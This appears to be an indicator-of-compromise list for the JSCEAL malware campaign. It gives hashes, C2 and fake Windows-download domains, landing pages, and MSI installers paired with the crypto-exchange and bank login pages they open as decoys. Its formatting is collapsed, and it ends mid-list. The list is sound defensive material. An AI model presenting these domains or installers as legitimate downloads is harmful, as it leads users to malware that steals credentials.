0288e840ec15cd9119fbeea91b297a8517d14060, 03f3b378e78df66df0ffdaa37e286c71b8ae0da7893112125c3fee29b76b1db9 f39b291beb753b162072917ab8c5afeb, ac7a5aee9f928e0cd529e5edccff0f8b075fe1f0, f8d598d28dbb8294a5c709ab23d51e29e652ab47d5a317aa31f6302481159458 4b81d938f3dc6e5774cd914a90df8d48, 1fbda05adb0a6f650e9b51a15663066d74b31ce2, a5b97ec3fee224213eebd1c762e0f874481af46bfcd521cbf3baba4b1c1b6037 a075a176257003562c558e9843f8f958, e099ad50884698b68fb3f0fe166026341a0e340f, 2ba5fdec63b23d7578bbb5c0a07bcae7fdcbb339acfff4fb4b2edd6e48a1ba62 86d14ae79d667bf8c21905cdfed18650, 05dca4eb3cf0a890458b9be6f060781d0e8f972f, 4889dda77ff5e7871e261d74b2ed83d987d3066471937b496e3b45101d3ddb93 3ec72215746ee41fb60b4dc0d6157644, 94f75e23ac65b0df442dba61ced44448472f1cd5, bc5d17555db59898dd15f43c8362d4f3c4013d80d64442d25d05f50caca00655 d2d9ca5ea7c824132f2cb7d4959fa77c, a339213acbb8ab9fc40d3a01f30a34c6ad2f5d7f, dce4294fb041c22de81d3eb4c4a178b5bdf6d9fb48b348556a51582553b3fb52 b55b683770c03b511ac195ff58f36381, 7cd8a2e9637068b4c61b3ef708a5b119ca243fb1, 8a9b2c59cfa1f332c12b430e0e7f367ea812871bb6825e172b85bb479068010d 6557b0c60f7bfd1fec9ffa10fb4dce9e, 02a9cc3919cc2dcf64f82f99deb3db31c4209a0a, c50fe7a338e7e2edb430688c87c65f92a0efd2115a8fab2e4e9776893d28db86 f08d6b6d012e0ce963b113e77460059e, 6e3846e4aa8242caaf3102caae24c35c24a1d2a0, 6e885af1b4b884c264f29253b80bfa47b29af7ac0757e5148e8cb3c342cd3183 9d47ab3a39b4216e25a208bcc6f63879, cf581e8bf451d77d332139bd6588a1dee6d42a42, 9ce4d4e97956c190d384837d42274d8db33ae6073ab318f1e55f3e03da62507d b1f3669ef4831bddaae61590d94e15d3, 689c3c1b1844e4966cb763d9fe3d0765215427fd, 209639849f74bf2736ede28b0a90a8f5799a14fb6a3fc79833ccc2144aa49b2d 0f55270d67513ffed2e0415e12005920, f5aeabf7522837e5f2f1bd168778787d38690017, 75e03884bf2f630c41ca04148cb28b7163945e146287fd1d2aafb10d3dd9b9d9 618eaf1c0a9ffae11717c861ff787395, 4dd68f317e1f23bb1839f237ba01d7b07693708b, 1d9945ac1a06f5ecef58d75452c898f39c6fa71f91274baf70404104bea63f36 8388d3383a87616ccee938cbfbda6e1c, 08db30e7c0250bfadfd3d5612a27c426ccaa1c1a, 1b757be18092f64e50127d80dff35d0da3d4e2d99ed199a6df134a86461a727f 4acd3f62656c25ae62b154eb4457b46c, 96db175831c576fda05c26410ce33d613587496e, c320e4d29fb661273e0cda16c756d962a62b2ad3d76ab13c4d1aa7dcb6168449 abfd68ed409f0a4759ab04bff972b400, 2f1015b309dd8b5c1746e37139110ab9fbb5dcff, a05f029c644f8ad912994a364aa4a6c1d64da0a894f7856bc9be251e598404f9 4ebdd18bd7878c60183cff89ca8c5e95, f8a39da59183eab03f2921e0dd246801f57e0dc5, 7ee0db8bade12d9861ccf8f43334a217c587d97bc0828238a98a325aaff75f8e a1540b1f5b1bc2c47af753c53a1c83f6, 5392ebf217532d0366603cb86ab71b274002f03e, 521e82117dc6d8d1a086f6094a31b3714677bdf5b8b27a40235e2d0d2ece3487 efbc1161c875bb228427f8c7dfac1670, 20eca9473792b4c175bc563aa1783c92f555420c, e51855ae6e8e69f66c2af6d939769385f53e57445b9734b1b4811c09bfc80c97 0c8c1315128f125178d5727d165d5cdb, 952b31597de781dd67ee90e8babf9b569d9d967a, 4188868248e8f74ecd2f2868605a77f1986dbbf74d3bf741135c69931673ad38 26b6df9c536e6684c5d7b26e4ca07908, 5dddf3292e68c8baca4bf24a34bf0aac30d8d1d5, 54c0ef7cca1112e75bff0ebca5da91a1ca66c531e0b6a47b1e85907e21cc8623 49050020b62b4a1f72e4f04f0ebf5405, 36282d52dc38c8a087ab5a823800b58ee4ab2856, ed6746a55f2160c586fdc66cd2c1db69f7fd0a73e6c2f1d83dd240c43828ba58 88826231c6f0dfe43ce86cacaf98a997, cf52bfeb65d7253393af064d3c996eeef2377b76, 111fc7d7dd1f4ba3a87927b1754a9b67d2c60d58feb1cd6cc28d6c0b4057184f fb130523e8b4bca50f98f5d81e12cf23, c9a45272e3ee1803db412ec9083407828375e107, d7cbdc2b5c57b1f61c771be74e56aefc05ebd8faeb0d9a7b02daff6946248dbb 62a8a36cfecedcdce9bb2b1a08001b38, 2be042428fd2009ce5752b6ead62d2d1e161c16a, 4297fccd1a4d3508ba166c3d32eaf6ac47a6267d2743eed2793de66d9c16a154 0e251a35851c7e5eac0c9566a3597ccf, a99c1f9c08a1fb7240c4323343dae91ec2c1a463, 4ec7fbeedbad503e91d7d564803f608982eb091f091c24bef88f1ce5b4bddf2b 5d482437afa21fb56647beffd41163cb, edd5f9b34fa1625c55121753bb471e5340fd5e31, 1e17595baf62c026c6a44c2b8d6ea8de501c2d8eda3adc6f2812ec01794e8a81 2adbf7b8b51cb3b082019593e61e0a87, 5f6c4c0e9e2651536dc5e6afa9ce24d07fdc55e6, 570408c97419092992370a1bf9b21e310b04ec3b56baa0ba0dfecccb5b1105ad 878c62cfa38f5cfde6068b1750cec93e, 92eb7be91158ca3d3a4271350dbf44395a2191a5, 43d80f600ebd0c2ba4768ea0600a6952e76fdcc659e7527f95dd89ca07d0a398 091dd53576f850f38a19b9b43b23526b, 85ee8404d304705acdecc3e8b5a97c8f9f4916c4, 498269312a98583200ffc3a376ef909e15f4a67096bac218c849928ad7eebc92 c5fe55d169d23c10a8513b4ef4c8e4a0, 97bb1c5dc40b34c5079940a21c0231252dd56506, 7423a2a11a00a2d43adf583f9465e776a69ceafe17d5a1c756b8160b243a9210 8a126210655f9ad42dd97080a048d1e8, 741eb5d1bbb8d1e71fd25beb88592437360efbcf, 99f9f2701ef2302072e77433a055db3ffece476f0a4aef91099ecdaefaf9bac0 25503db799f9b9be3193fd676470b8eb, 5c2a062de054f5c67265aea4e327416892c05649, 1c03556d7d881f037714ec5186da327467d3cd16c1ce9dfb16dd7fea736f2001 5e1da15a27f27f2467aecf0787907457, 7687b68c58ed26c9bf187439535151a279f95c16, 4705b21127e818572957d71cecda5c63b4f65cc59d00e9c1c9a226b595c5afe2 bbb22d09477607f59f12132bb1be1224, 95a1d519a4268bf832a3ffabeae8fad51c721d65, c417e37fb42f8b7fa282992a11b1d75840b035b92e0e39891cf153cc373c0c4e 31c3d501753e6c8fd81f4d123335996c, cb6e9257e3d1151209aaeb6c4534e87f0995525f, 52c0ebf80ba046488b988d32d8dc35eff170e44b29d06a0012c092f5f1ca7b50 f2d95f426e514a4cb1f44b4bf1158b39, 05faed491f1294866098f05ddd325464fb681d7a, 825ece5c2dc6fb79a8afdf15daa32868a3cba71e726e2171025017fed1f2d606 fc91a9b1543f1cb799949fa9cfa12fff, 2769ae3a02730b92bb65b82ae87d8efaf9b8b5e2, 8acc2c1e5b6cb4266bfa926972b03d4b5bb4fad6f2a65adb78acf47cf0225404 38d26cb3264301e5687eda8a0d0bb8eb, 2db09527b87a5e1c88a63d2c7bed5c63f9d5a058, 1835390a86dc9da1ed4da909f1ba7a9c21448bd2d19858491ab9aaefdcf50fcc ec9937daa32f9aff092f2943923c3e7e, eb01839eb31b9895fcc5ae6e1c4c3ba56ab30b24, fb35436322e9429a498f79b9abea24ca419fafab93117582c3e97f9beab3a034 ab5d15b3c74185c0680c2c253e2145be, df7726f1f5848ba869b8df7031dc395fc6c4c764, a02f1d868e1d18c8b8159d4fa915bc238d35824ac553cd835ef9702e28b1ebb7 3fc0db85b0f40212fa2306694af797c9, 059daf80a526a028bbf4d7d91875b02ee444b329, 008ebf99c5d6ba123da31e70d342615b902b62d948e7e391fa14c12401367531 49561818df43e1db5ab6bf5804889b61, ac0b2a4763e346f67ee25110e905cf970bbfe466, 2339d4df537806bad1a503831c90f45174fe3700afb214d85a4e3a2e0007b0c8 74e79beeced726fd127575aa42a69431, ba49ed8cdcef4bf9e7f5e64787e6ce98dca8395f, df93e348cc67d04318c0e439f5dbca681a3c1112924f57393cb57fc6a3d121d6 1e1a1f4d4ac004d8bbf752550d68ffde, 5959b54019a549c359e9852461360f180152273c, 146173888f2910ab7e5a8bfb096af6e2b245f049f5b89f53052d509dee2422e5 5b0a88c2115d3fd0e1a2ba38f068f0fd, c950d149e857a8095417aae96f072813e1e1089e, 2701e53ba45d9b87fecd02e14609a87531d34b1503c2616c5fa2bb3fb45bf292 aad0558d2dc9de7e9e41d2de90adb4ba, 13ddb3f98824ab1bcc5451da7fa98d12ea506af0, 9e56b950de6ef2e38f866921e7c311f074b7edb9735257c2d0d57cd3d2067d5b 306cdb47cac48c7ab9e149fc4ec4d639, 078b788d68f06c0144e9c3e83bd6f69f6ce1ff2c, a2b4413d9280aa2662643305ef7e624719e4e8c9dd7bfed15bf2867bea08901f 0824cbf2df3cc8f86cd0eee13975585c, 2b5cea8a02fee134260c9e1b46b9e462dd76744d, 84195ae96768bc312b7494a8ba0493a772042bed068bc019c8d3dd9daf39bbf6 e03b9853cbb6c1e93b400f33530455eb, f1c3a0230f140fa069d6b067fb5842a0f5d4e483, af8fafea328954d50c459e3da9bcb0df2fa468e4e9df1cdbf827aa99bc1a9378 ea6c11bb2e9bb591659a483631efd871, 702fffc82a75f51d90af8c5face23247c04047fd, 84174151afe82a85b035f66f99e6a47aa0f7ccdc32414371a434551a6ba9d216 4043d842684ac028b56106319984d8ba, 7c5cd7b679b14d303e2466b1e6fafb4c93ccc309, f97b286d61b26c98b900bb842fb7a5ccd781162bbeca8032f9c0ed81fe93fb7d e110e19ae0469124cfb032eb3dd20e26, 94157620576e43158c1c165ed0baded39545d302, 86ca0cac017def21fcf74ecae8a00aa8830d825cad4f694d89a5af9954ce0234 7e0c821eeb3ce5e7a2ebc5e38e9ae2e9, d0dae5ad7fe1a650d6f4f43983486003a93dd73d, 62f74adf117bf42d3b6a1bf661a301e29c921bd229aab384ffe3f582040a754c 92680e3eb26b9f4bec1d39bd93b13997, 974abb721531204d5bc6fd20e3495991ed822206, 58ffc7ad61b7d8038b45e1e2162b98d7e011b29fec1601068a98f6a272611b3e 57eb6f738de68b2daa9b2980ca61d919, 4f7c851811666535da206023871dbd663c6ffd3e, 05bb24fc76e97ae16d5d34d060cbcb015d8d89fee5fb2d2627600c86c7b9df47 087ec66114807cbdacd7bf03fa136c7a, cbb92f2920f10b272636d2024e7c598994087e14, 1773359f8c24fdbe6aa5ae94ea3988164c62a5ff5f1f28ca4ea0b04aab8f5a69 1a2a8f3ca50bf034bba638bb7181b517, 0632e00b95cf3885df92dbd8f04b55a4b9a82b00, 7af6c284b3bd701476929e8888b13015c31def1039bef91c63ba15368d9771ba e9d3423c37805d610f49bffe90e71810, 3a6e7ad0122a7723f31e4d1cbae826d9ed9aadeb, 3bcc05127c22b70f84ab4d252321fb35ec77a5db23764f4888094882dc4f9554 53417106bd0d8da15a899735535971fd, ac400028f5446759741879b3c98abc6bf9f7adde, 15d80a960ca81969063e1ef6181bc91fc2a1198a3065eb3eac4cafff49927ab5 93f2710078f78d8893e410269f6ea36e, 4ad873827bbf70f7171e508395afb5c6ed3c871c, f1c3e6e5e7b63db19da86914726389b058a085830e0496173defe01d07849b9b 324563d288a19ed217aa5af275cc4d29, 46ddadc7bf21d30a394b5bc0b03afad412cdb391, 0265572bc65a4b9c9df8ce5396b3eb0f5050e677c83cc33427f168111cadd270 c8fdd3ad53bdd26a5f8cbd336fda5ce5, 5e5b71d0aa0b92d1021a21f93cf10df3fc949c46, c3bca61beb2a6027bc5f15cf93f47749c9406bee22ee0b579a7ffb0511e6c054 8868a5419ce69645652262ba67e286e6, 609a480423567cc011c721f4602436eed1c4c1f4, a817fba621e90c631d3ed9d062d12c34e4ef211385dede672a7eda4b5543e533 fdbcaa368f7adc1c97938b658d059292, f71800327ff9c3444b015631fe0753e57256502f, 257201487770ac57345a1abdc90599bc78f5a9ab95b4ca0b9ff2cb699ddccf7d 28fbaebd5d6e716da99a249b14996f4e, 22211d985ba231c67cb0d28ce6a66b0e7d2801e9, 8e7a3c7d6e0b0569f4d521482935d9627be10cfef10e4ba17e59b2167d258fac 9b78d17f55e61d58950dc5e62f2d6f69, e863c0605a3605609d2a78ba667823901f560516, f5196deca103fba2b4de772a1415bafc616e5baa3fc6a388d0f8ee79d6f350f8 a04fac7c92aa3ed7fb697b393e2f122a, 5e60aaff9789dac63ae8d4715d5de7d44b3523f6, d7dba181b322bc6f51b7e530e924ba4f60b7334a72be7c5d92fd219502bb252e 10200fa6eba57e1e829dc725fc28f7d8, 95fbcbbaf2f89e59fee29580e888b8a07252b85b, 040aca668b27bb12a083e4fd81e2e8ee5e48b5a87ecfac12196a855181e1fac6 807367ad3d7bb867e55333361793fbbe, 7bab83c4486f893d6d32d85a69d1bfda867faafa, 7084b80c30b30679ccbb42014f60a079f2de8e31daeaf0b7463ab305916d52b9 93e44d58bb02207aacbfce8bd707eacf, 9744ed65cc9c6ac00d57be9a84d317e91d7c99e0, 8a7cf380772eabbe54d60dd713b0c733de67e82f4295b6638b81aaa76037e1111d5e6904dabef0988b25b1f99160bd2b, b7911393812ca8b4f6cf274d4cee670efec8f8ba, 7d2c797e363d45c74d90ad23438072c4e80ee2a1aa3aa8ea7f4d414b264d91cd d3a30c555711cc5a0424bf8cd1fb109b, d59660e0675097db16364c1085b2f150719d10f9, 1fb0b09c0a88665a3f2176555f58aa5ca5944d216f95143584f070468e184723 f1df96d5aa7267c124dde8c6e4ce6fd3, dc8e0a7cd9779823b9310db81ba283ff5fe8dbed, 22c9540bf90fa46e35ebe978406214560f8e71c4e652bfd079c8e6ee2347bae7 db161cc1cd7b90f16089a646aa5f9e4d, 917d894f1cece8814f1fb8e791dfeba8b65aa8d1, a9528e99a5b0a288855fca1d3a03975fe99ad6c5b8702a27d12e94c9a7a5367d 32495bd3877b7e497516b9da5f34395f, d136d9fc384f5b459f10ac428d28b2a53b027657, 680da0b4d9f0c553dcdacdbbf516f59fcedd3a87f24aa1b59e9858b089d14329 bb9a7873f880802c84c5a9e78898adb8, 8a018b77b1a8e935e2f33c4b437b74cadaf437a6, cd6785e9690349d95ce34d30befe8b472f304e7c1129a0824c6e7a909aab7805 db9d84d3b7a234d5ed13d6ae03a3fdac, fa1ef167f8de956f20370f94c3e5769d4fa1ee43, d4bd8ba1ca7643016e324cdee81f46b2c5a49508fdc9011d71abeeea672e35fa 4b81d938f3dc6e5774cd914a90df8d48, 1fbda05adb0a6f650e9b51a15663066d74b31ce2, a5b97ec3fee224213eebd1c762e0f874481af46bfcd521cbf3baba4b1c1b6037 618eaf1c0a9ffae11717c861ff787395, 4dd68f317e1f23bb1839f237ba01d7b07693708b, 1d9945ac1a06f5ecef58d75452c898f39c6fa71f91274baf70404104bea63f36 4acd3f62656c25ae62b154eb4457b46c, 96db175831c576fda05c26410ce33d613587496e, c320e4d29fb661273e0cda16c756d962a62b2ad3d76ab13c4d1aa7dcb6168449 4ebdd18bd7878c60183cff89ca8c5e95, f8a39da59183eab03f2921e0dd246801f57e0dc5, 7ee0db8bade12d9861ccf8f43334a217c587d97bc0828238a98a325aaff75f8e 878c62cfa38f5cfde6068b1750cec93e, 92eb7be91158ca3d3a4271350dbf44395a2191a5, 43d80f600ebd0c2ba4768ea0600a6952e76fdcc659e7527f95dd89ca07d0a398 31c3d501753e6c8fd81f4d123335996c, cb6e9257e3d1151209aaeb6c4534e87f0995525f, 52c0ebf80ba046488b988d32d8dc35eff170e44b29d06a0012c092f5f1ca7b50 0824cbf2df3cc8f86cd0eee13975585c, 2b5cea8a02fee134260c9e1b46b9e462dd76744d, 84195ae96768bc312b7494a8ba0493a772042bed068bc019c8d3dd9daf39bbf6 93f2710078f78d8893e410269f6ea36e, 4ad873827bbf70f7171e508395afb5c6ed3c871c, f1c3e6e5e7b63db19da86914726389b058a085830e0496173defe01d07849b9b 324563d288a19ed217aa5af275cc4d29, 46ddadc7bf21d30a394b5bc0b03afad412cdb391, 0265572bc65a4b9c9df8ce5396b3eb0f5050e677c83cc33427f168111cadd270 b11b863822b176acadf4b3645cf7eace, a5f5933917be3adaa6d4a1d7a00f33ccc69280e9, ad558fb6438fc5d7b1a6af482646ea9d7a344221fa9f077d21f5ebdee2e223c8 75b2f873b5698cd37d57f9faadb2f826, 5ddc5c662d0612c8c61bcec7ca8a3ef47afa625f, 27867b97cd0228c773e10c63859c39afcb24966b7b662542a31a24fbb212c754JSCEALJSCEAL C2“vertical-scaling.com”“ggr-lach.com”“llm-0014.com”“hat-kett.com”“7777-202.com”Redirection domains (64)app-pc-windows.comapp-windows.comdownload-apps-windows.comdownload-windows-desktops.comdownloads-apps-windows.comdownloads-desktop-windows.comdownloads-windows-app.comdownloads-windows-apps.comwindows-downloads-app.comapp-desktop-download.comapp-desktop.comapp-desktops-downloads.comapp-desktops-pc.comapp-downloads-desktops.comapp-pc-desktops.comapp-pc-download.comapp-pc-downloads.comapp-pc.comapps-desktop-download.comapps-desktop-downloads.comapps-desktop.comapps-desktops-download.comapps-desktops-downloads.comapps-desktops-pc.comapps-download-desktops.comapps-downloads-desktop.comapps-downloads-pc.comapps-pc-download.comapps-pc-downloads.comdesktop-app-download.comdesktop-app-pc.comdesktop-apps.comdesktop-downloads.comdesktop-pc-download.comdesktops-download-app.comdesktops-download-pc.comdesktops-downloads-app.comdesktops-pc-download.comdownload-app-pc.comdownload-apps-desktop.comdownload-apps-pc.comdownload-desktop.comdownload-desktops-app.comdownload-desktops-pc.comdownload-desktops.comdownload-pc-app.comdownloads-app-pc.comdownloads-app.comdownloads-apps.comdownloads-desktop.comdownloads-pc-desktop.compc-app-desktops.compc-app-download.compc-app-downloads.compc-app.compc-apps-download.compc-apps-downloads.compc-desktops-apps.compc-download-app.compc-download-desktop.compc-download-desktops.compc-downloads-app.compc-downloads-desktop.compc-downloads.comLanding pages (5)https://apps-download-pc.com/download/windowshttps://windows-apps-pc.com/download/windowshttps://downloads-desktop-apps.com/download/windowshttps://windows-apps-download.com/download/windowshttps://desktops-app-download.com/download/windowsMSI Installers (105)sha256Opens msedge window with012c29675f4680830380c13ab008d8275e7b767d99cf1bde6f07048f8af60753https://web.pdax.ph/auth/login01c3b49ff55dfbe738b6c9370681b1985abd34641a75803fea1468e102b726c9https://app.3commas.io/en/auth/login03f3b378e78df66df0ffdaa37e286c71b8ae0da7893112125c3fee29b76b1db9https://www.facebook.com/044e8525eff98c030632fb52cd145c404f7f1fe22c99f74afd3f9b14e38f2375https://www.bitget.com/login05bb24fc76e97ae16d5d34d060cbcb015d8d89fee5fb2d2627600c86c7b9df47https://www.tradingview.com/111fc7d7dd1f4ba3a87927b1754a9b67d2c60d58feb1cd6cc28d6c0b4057184fhttps://accounts.binance.com/en/login146173888f2910ab7e5a8bfb096af6e2b245f049f5b89f53052d509dee2422e5https://www.bybit.com/en/login15d80a960ca81969063e1ef6181bc91fc2a1198a3065eb3eac4cafff49927ab5https://www.tradingview.com/1773359f8c24fdbe6aa5ae94ea3988164c62a5ff5f1f28ca4ea0b04aab8f5a69https://www.tradingview.com/1b757be18092f64e50127d80dff35d0da3d4e2d99ed199a6df134a86461a727fhttps://www.tradingview.com/1d9945ac1a06f5ecef58d75452c898f39c6fa71f91274baf70404104bea63f36https://minepi.com/2339d4df537806bad1a503831c90f45174fe3700afb214d85a4e3a2e0007b0c8https://www.tradingview.com/2701e53ba45d9b87fecd02e14609a87531d34b1503c2616c5fa2bb3fb45bf292https://www.okx.com/account/login2b647bde846907c875504a3bf9df1ad12bf3a904130dd481ee8cac2effc9aa3chttps://stake.com/3545b3debcfc385f169c92edca55dc5c9d394580fac1482a8394af5806b996b8https://www.lbank.com/login3bcc05127c22b70f84ab4d252321fb35ec77a5db23764f4888094882dc4f9554https://static.bee.com/html/bee-login/index.html?clientId=beecom4889dda77ff5e7871e261d74b2ed83d987d3066471937b496e3b45101d3ddb93https://www.okx.com/account/login4e8dcef6a5c8c44a2910d0dc0b300f4d88ee5d4c71c9e5a710564062ca1c5f9fhttps://www.tradingview.com/4ff0bb65fb61bd59ab3fce204686a9e144989c65a1b92849bba5a144f9a23e77https://accounts.binance.com/en/login521e82117dc6d8d1a086f6094a31b3714677bdf5b8b27a40235e2d0d2ece3487https://www.okx.com/account/login54c0ef7cca1112e75bff0ebca5da91a1ca66c531e0b6a47b1e85907e21cc8623https://accounts.binance.com/en/login58ffc7ad61b7d8038b45e1e2162b98d7e011b29fec1601068a98f6a272611b3ehttps://accounts.binance.com/en/login62f74adf117bf42d3b6a1bf661a301e29c921bd229aab384ffe3f582040a754chttps://www.bybit.com/en/login680da0b4d9f0c553dcdacdbbf516f59fcedd3a87f24aa1b59e9858b089d14329https://minepi.com/6e885af1b4b884c264f29253b80bfa47b29af7ac0757e5148e8cb3c342cd3183https://www.wowbit.com/login73d720a65e9db50ab62ef0b0f2388463f802e9d1a2557c5ecbe2d7bccd146fb6https://www.tradingview.com/74c9175036bcaa239f433a98606df3a3be60ab9246f2067f500cea4b2be09a8fhttps://www.tradingview.com/75e03884bf2f630c41ca04148cb28b7163945e146287fd1d2aafb10d3dd9b9d9https://www.tradingview.com/7a6beb95d6c5c790cdfe04d4634f5ebf24707f80ed75ba20c09b1b78e4f448a5https://app.3commas.io/en/auth/login7af6c284b3bd701476929e8888b13015c31def1039bef91c63ba15368d9771bahttps://www.tradingview.com/7ee0db8bade12d9861ccf8f43334a217c587d97bc0828238a98a325aaff75f8ehttps://minepi.com/84195ae96768bc312b7494a8ba0493a772042bed068bc019c8d3dd9daf39bbf6https://minepi.com/86610f1a2c87b80c898ec485681193f0788c017f2d0f73fad26b259655c6a8a5https://www.lbank.com/login86ca0cac017def21fcf74ecae8a00aa8830d825cad4f694d89a5af9954ce0234https://www.tradingview.com/8a9b2c59cfa1f332c12b430e0e7f367ea812871bb6825e172b85bb479068010dhttps://sso.revolut.com/signin9ce4d4e97956c190d384837d42274d8db33ae6073ab318f1e55f3e03da62507dhttps://www.tradingview.com/a05f029c644f8ad912994a364aa4a6c1d64da0a894f7856bc9be251e598404f9https://www.tradingview.com/a5b97ec3fee224213eebd1c762e0f874481af46bfcd521cbf3baba4b1c1b6037https://minepi.com/abcbbaf9e5b34d59c9caa015a0276a457e0de2b403a5a8aff37617f141f1bb96https://remitano.com/ng/loginaf8fafea328954d50c459e3da9bcb0df2fa468e4e9df1cdbf827aa99bc1a9378https://www.tradingview.com/b1b608c7f0d943b48102237347754e593ac09715f0deda6a4a61730ece03a942https://www.lbank.com/loginbc5d17555db59898dd15f43c8362d4f3c4013d80d64442d25d05f50caca00655https://www.bybit.com/en/loginc320e4d29fb661273e0cda16c756d962a62b2ad3d76ab13c4d1aa7dcb6168449https://minepi.com/c3bca61beb2a6027bc5f15cf93f47749c9406bee22ee0b579a7ffb0511e6c054https://kbiz.kasikornbank.com/authen/login.jsp?lang=enc50fe7a338e7e2edb430688c87c65f92a0efd2115a8fab2e4e9776893d28db86https://www.tradingview.com/c65fdb27d1b478a4926c2e283f8c50e827d522c13ba56da67e1fb436548a4454https://www.kfc.co.uk/account/loginc7eedf31cf9e456cc9eb419edf30573f9ba03e80faccce9e86373e935f6c1b93https://app.3commas.io/en/auth/logincd6785e9690349d95ce34d30befe8b472f304e7c1129a0824c6e7a909aab7805https://minepi.com/d4bd8ba1ca7643016e324cdee81f46b2c5a49508fdc9011d71abeeea672e35fahttps://minepi.com/dce4294fb041c22de81d3eb4c4a178b5bdf6d9fb48b348556a51582553b3fb52https://www.solflare.com/e51855ae6e8e69f66c2af6d939769385f53e57445b9734b1b4811c09bfc80c97https://www.tradingview.com/e7945eee02f90a9a03eb82e64fcc8ed07fd1d6d528afe0f8f948699b0497c5f0https://www.lbank.com/logined6746a55f2160c586fdc66cd2c1db69f7fd0a73e6c2f1d83dd240c43828ba58https://www.tradingview.com/f8d598d28dbb8294a5c709ab23d51e29e652ab47d5a317aa31f6302481159458https://www.tradingview.com/f97b286d61b26c98b900bb842fb7a5ccd781162bbeca8032f9c0ed81fe93fb7dhttps://www.okx.com/account/login0207f65982931abbd6984c61dc0ae183de6ecd3a2142899bc6df37a1b21c591ehttps://www.tradingview.com/0e5343b83417b68521711acfa06375ebc8340750cf1a33d6709b2dd64704bd10https://accounts.binance.com/en/login0f6357f4dbc36dcf73b4e83f9af5a796e81742a1aab11c2c2ecdc0ea2691df41https://www.tradingview.com/6a3cd43d6ee7744631efb49d40ed38dcd88f8801f85992c703e2a44f13291243https://www.tradingview.com/a22d15afdeeb983d73255e274a8b62b76d267ca1cf943228d17992ceb6fd1643https://accounts.binance.com/en/logina9528e99a5b0a288855fca1d3a03975fe99ad6c5b8702a27d12e94c9a7a5367dhttps://minepi.com/d8ebbee135dba28a08fd975366ddf62d3ab2ed10f2b339b867ba6800cbb9321ehttps://www.lbank.com/login1f874d70bafdad4f62ce21e416466513d9e681c70f87a4ad3acc7a9851cdcbf3https://www.lbank.com/login22c9540bf90fa46e35ebe978406214560f8e71c4e652bfd079c8e6ee2347bae7https://minepi.com/4fbebb8e16bb4c9221c547656fa9f18f533ed8036d7604fef889c6409daf7e54https://www.tradingview.com/72feb1a5349d6de289ba46509ab8b85fd91179fb533b607150d977914e924136https://ton.org/aea07f55e7851af845087e89e95deb2a9d2c32ff55c7ec292882958a6bcc0f2fhttps://app.tokenmetrics.com/en/signin7f4605af2fd2c83bfd83a78b14281f8b7fca72a63593b69d0cac2d3a2642dc56https://www.htx.com/login?backUrl=%2F7b9cbff414d510e0ecb370178a0c557303923a7d1fd4ed9fd477b36bd55ba292https://www.okx.com/account/login7ec75e7bbb70ae4eae79e0951231e479d28490ba090b628f2d252041370b2da5https://remitano.com/ng/login8e7a3c7d6e0b0569f4d521482935d9627be10cfef10e4ba17e59b2167d258fachttps://www.tradingview.com/a2b4413d9280aa2662643305ef7e624719e4e8c9dd7bfed15bf2867bea08901fhttps://www.tradingview.com/0a3cb06b5ac5ad76105605ac88936966fe5f804488e6bd1882de1f27e30b6246https://remitano.com/ng/login9ddbcec30e6505d03b93dbce3b6afa03c000b1896ef751d60c4d3dac595631a8https://www.solflare.com/8c378cbab23d6cec3fd5b0a594f185f74d5e5c7612c3e046d3e571bb96b1b913https://www.wowbit.com/logind6a846d0343e3c9088901a79165108ea13581f197b96ee71c642ecb79f7f043ehttps://www.metatrader5.com/0cf69974c8b30fd6cbd6177f7afdef3708d80c102714a49e4ad0c05760bb8fb1https://www.bybit.com/en/login9e1630d8b4dbbaeeee8f0b1c453ae2fd38b3c5fd21059aa18b26f1806966ab37https://www.bitget.com/login644a85f882979dbb5dcff30823a83935bf97c1a80fd9c670e70c65d9461a6c01https://www.gate.io/login73699bf86cdb85a15174ed788a7504adaad8ba4ca15871ad9e672db7779e09d4https://dexscreener.com/869ab661ae67d16d91da2e9edd9a4db7fb5a342043336e62ace5ff54738c8926https://dogecoin.com/86dbef518d357a9b1517cd9dfdcf1b611f2c1afcf4496cefa99a4f2c3dff21e4https://www.tradingview.com/e14f1f80f192f1c36854474e7da7e660d06eca0a199df08c2aa6e34eb4847953https://www.upbit.com/upbit_user/private/signinc99e1e6ed8752b09a8d90fe470643da40013b04fdeac5b554b795e3ec8e2628dhttps://sso.revolut.com/signin1e17595baf62c026c6a44c2b8d6ea8de501c2d8eda3adc6f2812ec01794e8a81https://accounts.binance.com/en/login2ba5fdec63b23d7578bbb5c0a07bcae7fdcbb339acfff4fb4b2edd6e48a1ba62https://www.ledger.com/3228733606853dbff40f8874c88865f23b4cb0f07aebe746a77245a353c1f519https://www.tradingview.com/43e385e3ce0f4d50b506829c3c42fcc680f1a47a495ee44aa995556ca8cde0dehttps://lutia-nwl.link/#/auth4ec7fbeedbad503e91d7d564803f608982eb091f091c24bef88f1ce5b4bddf2bhttps://www.tradingview.com/833841da3f61be8ec8eb6c660f592772fa6085563a4ce9bc8ea33dbc646cef24https://ton.org/b6e4075d371dfaa63c8a78fc4c03cfb6051202d347e6c803c6d8962b24d0b6e8https://accounts.binance.com/en/logine48eba9d41a2d46d963c1117604005f53afce3e7e1ac5e0a7cca3b642720e7c2https://www.twex.exchange/1fb0b09c0a88665a3f2176555f58aa5ca5944d216f95143584f070468e184723https://minepi.com/535bfac9fc9efd2d3abad5050a1c0165acedfbbd55ea9b701dbd9717cc387a9ahttps://g.co ← seems to be testing installer66171f98e42211b0aa0e8b75bf57facb7940925358f493a0c18674e87dacc1c0https://remitano.com/ng/login9667c18082a1d40b9b28b8eacf92df97226be3be93090eb599ef247eb50e1176https://g.co ← seems to be testing installerc7edcad8b139961ff93aba148b16227147b019b036cdce58522979c9b833a0bfhttps://www.tradingview.com/9bfe57d6f74fd822c7431ee3fedb0ef36c6841634f015aa8a364006a68d45310https://www.tradingview.com/e881682b59640c05cd540696955a849610260415e576f79b62383108c1aa3354https://accounts.binance.com/en/loginc9b14e41443d3d43907352f5c6cf46c53e7c9b69bf9299f8d61081e314e5ad4fhttps://accounts.binance.com/en/logina696d03aeb1bde633b674bdd640a1a313cae7da711d99cfba3fd06f02d3864dehttps://www.tradingview.com/0a5e5d64c5af3c26e35af64f8ba5b5f022a53a6a15b46dfe24c9cb0e2b06cbb1https://www.lbank.com/logind7cbdc2b5c57b1f61c771be74e56aefc05ebd8faeb0d9a7b02daff6946248dbbhttps://www.tradingview.com/008ebf99c5d6ba123da31e70d342615b902b62d948e7e391fa14c12401367531https://www.tradingview.com/209639849f74bf2736ede28b0a90a8f5799a14fb6a3fc79833ccc2144aa49b2dhttps://accounts.binance.com/en/loginPowerShell 